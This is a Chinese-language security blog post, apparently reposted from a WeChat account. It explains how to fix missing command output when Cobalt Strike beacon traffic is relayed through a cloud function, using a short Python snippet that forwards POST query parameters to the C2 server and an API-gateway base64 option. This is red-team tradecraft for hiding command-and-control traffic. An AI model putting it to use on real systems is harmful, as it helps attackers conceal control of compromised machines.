-
云函数自动编码 -
增加 post 参数传递
打开 beacon 指令页面,发送一下数据看看。
发现出现了如下字样:
查看受控端发送的 post 数据包如下:
查看了一下云函数的 post 日志:
再次进行抓包,发现 CS 的上线包 post 是带参数传输的,如图所示:
这样之后就能正确回显了。
另外,有读者表示,可以直接使用 api 网关进行转发。
在网关设置中开启 base64 编码,然后只设定特定 header 触发(不然会把 get 请求也进行 base64 编码)。
然后在函数中解码传输就好了,如下:
params=event['queryString']
resp=requests.post(cs_server_address+path,headers=headers,data=body,timeout=20,params=params)
如图所示:
开启网关 base64 编码,在网关设置中开启 base64 编码,然后只设定特定 header 触发(不然会把 get 请求也进行 base64 编码)。
公众号内回复“云函数”,可获取完整云函数代码。
- END -
关于微步在线研究响应团队
微步情报局,即微步在线研究响应团队,负责微步在线安全分析与安全服务业务,主要研究内容包括威胁情报自动化研发、高级 APT 组织&黑产研究与追踪、恶意代码与自动化分析技术、重大事件应急响应等。
微步情报局由精通木马分析与取证技术、Web 攻击技术、溯源技术、大数据、AI 等安全技术的资深专家组成,并通过自动化情报生产系统、云沙箱、黑客画像系统、威胁狩猎系统、追踪溯源系统、威胁感知系统、大数据关联知识图谱等自主研发的系统,对微步在线每天新增的百万级样本文件、千万级 URL、PDNS、Whois 数据进行实时的自动化分析、同源分析及大数据关联分析。微步情报局自设立以来,累计率先发现了包括数十个境外高级 APT 组织针对我国关键基础设施和金融、能源、政府、高科技等行业的定向攻击行动,协助数百家各个行业头部客户处置了肆虐全球的 WannaCry 勒索事件、BlackTech 定向攻击我国证券和高科技事件、海莲花长期定向攻击我国海事/高科技/金融的攻击活动、OldFox 定向攻击全国上百家手机行业相关企业的事件。
内容转载与引用
1. 内容转载,请微信后台留言:转载+转载平台+转载文章
2. 内容引用,请注明出处:以上内容引自公众号“微步在线研究响应中心”
都看完了,不如点个“在看”再走~
原文始发于微信公众号(字节脉搏实验室):关于云函数无法回显的解答
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论